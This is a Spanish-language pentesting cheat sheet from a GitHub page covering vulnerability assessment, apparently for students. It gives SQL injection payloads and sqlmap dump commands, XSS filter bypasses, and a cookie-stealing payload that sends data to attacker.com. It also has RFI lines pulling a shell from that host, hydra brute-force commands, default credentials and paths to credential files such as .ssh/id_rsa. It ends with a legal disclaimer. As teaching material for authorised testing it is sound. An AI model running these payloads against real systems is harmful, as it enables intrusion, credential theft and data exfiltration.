Skip to content

Latest commit

 

History

History
293 lines (207 loc) · 5.84 KB

File metadata and controls

293 lines (207 loc) · 5.84 KB

🔍 VULNERABILITY ASSESSMENT - Comandos Profesionales

Por: @3diklab Última actualización: Noviembre 2025 Nivel: Intermediate


📋 Índice

  1. Version Research
  2. Web Vulnerabilities
  3. Service-Specific Vulns
  4. Misconfigurations
  5. Automated Scanning

1. Version Research

SearchSploit (Exploit-DB local)

# Buscar exploits por keyword
searchsploit apache 2.4

# Buscar por versión específica
searchsploit -t "openssh 7.4"

# Mostrar ruta completa del exploit
searchsploit -p 12345

# Copiar exploit al directorio actual
searchsploit -m 12345

Pro tip: Usa -t (title search) para resultados más precisos.

Online Resources

# Google dorking para CVEs
site:cve.mitre.org "Apache 2.4.49"

# Buscar en GitHub
site:github.com "exploit apache 2.4.49"

2. Web Vulnerabilities

SQL Injection Detection

# Manual testing (basic payloads)
' OR '1'='1
' OR 1=1--
admin'--
' UNION SELECT NULL--

# SQLMap (automated)
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump

# SQLMap con POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=admin"

# SQLMap con cookie
sqlmap -u "http://target.com/panel" --cookie="PHPSESSID=abc123"

XSS (Cross-Site Scripting)

# Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Bypass filters
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<SCRIPT>alert('XSS')</SCRIPT>

# Cookie stealing payload
<script>fetch('http://attacker.com/?c='+document.cookie)</script>

LFI/RFI (Local/Remote File Inclusion)

# LFI basic
/page?file=../../../../etc/passwd
/page?file=....//....//....//etc/passwd
/page?file=php://filter/convert.base64-encode/resource=index.php

# RFI
/page?file=http://attacker.com/shell.txt
/page?file=\\attacker.com\share\shell.txt

# Null byte bypass (PHP < 5.3)
/page?file=../../../../etc/passwd%00

IDOR (Insecure Direct Object Reference)

# Cambiar IDs en URLs
/user/profile?id=1    → id=2, id=3, id=1000
/download?file=doc1.pdf    → doc2.pdf, admin.pdf

# Cambiar IDs en POST requests (usar Burp Suite)
POST /api/user/update
{"user_id": 100} → {"user_id": 1}  # Intentar ID de admin

3. Service-Specific Vulnerabilities

SMB Vulnerabilities

# Detectar EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 <target>

# Detectar todas las vulns SMB conocidas
nmap -p 445 --script smb-vuln* <target>

# Enum4linux (enumeración completa)
enum4linux -a <target>

# SMBClient (anonymous access)
smbclient -L //<target>/ -N
smbclient //<target>/share -N

SSH Vulnerabilities

# Banner grabbing
nc <target> 22

# Detectar claves débiles
nmap -p 22 --script ssh-hostkey <target>

# Bruteforce (usar con precaución)
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target>

HTTP/HTTPS Vulnerabilities

# Nikto (scanner automático)
nikto -h http://target.com

# Detección de métodos HTTP peligrosos
nmap -p 80 --script http-methods <target>

# Shellshock (CVE-2014-6271)
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/test.sh <target>

# Heartbleed (OpenSSL)
nmap -p 443 --script ssl-heartbleed <target>

FTP Vulnerabilities

# Anonymous login
ftp <target>
# User: anonymous
# Pass: anonymous

# Bruteforce
hydra -l admin -P passwords.txt ftp://<target>

4. Misconfigurations

Weak/Default Credentials

# Servicios comunes con credenciales por defecto:
# - Tomcat: admin:admin, tomcat:tomcat
# - MySQL: root:(blank), root:root
# - PostgreSQL: postgres:postgres
# - MSSQL: sa:sa, sa:(blank)
# - RDP: administrator:administrator

# Bruteforce genérico con Hydra
hydra -L users.txt -P passwords.txt <service>://<target>

Exposed Configuration Files

# Archivos de configuración comunes
/.env
/config.php
/wp-config.php
/web.config
/.git/config
/.aws/credentials
/.ssh/id_rsa

# Fuzzing con ffuf
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt \
  -fc 404 -mc 200

Improper Access Controls

# Directorio sin autenticación
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Archivos sensibles
/admin
/backup
/uploads
/.git
/.svn
/phpmyadmin

5. Automated Scanning

Nmap NSE Scripts

# Scan general de vulnerabilidades
nmap --script vuln --script-args=unsafe=1 -p<ports> <target>

# Scripts específicos por categoría
nmap --script "auth or broadcast or discovery" <target>

📚 Recursos Adicionales

Wordlists Esenciales

# Directorios/archivos
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Passwords
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt

# Subdominios
/usr/share/wordlists/amass/subdomains-top1mil.txt

Databases de Vulnerabilidades

Frameworks

  • Metasploit: msfconsole → búsqueda y explotación automatizada
  • Burp Suite: Proxy HTTP para testing manual avanzado
  • OWASP ZAP: Alternativa gratuita a Burp Suite

⚠️ Disclaimer Legal

IMPORTANTE: Estos comandos deben usarse EXCLUSIVAMENTE en:

  • ✅ Máquinas propias
  • ✅ Entornos de laboratorio (HTB, THM, etc.)
  • ✅ Pentesting autorizado por escrito

El uso no autorizado es ILEGAL y puede resultar en cargos criminales.


¿Dudas? Comenta en TikTok: @3diklab

Sígueme para más contenido:

  • 🎥 TikTok: @3diklab
  • 🐦 X: @3diklab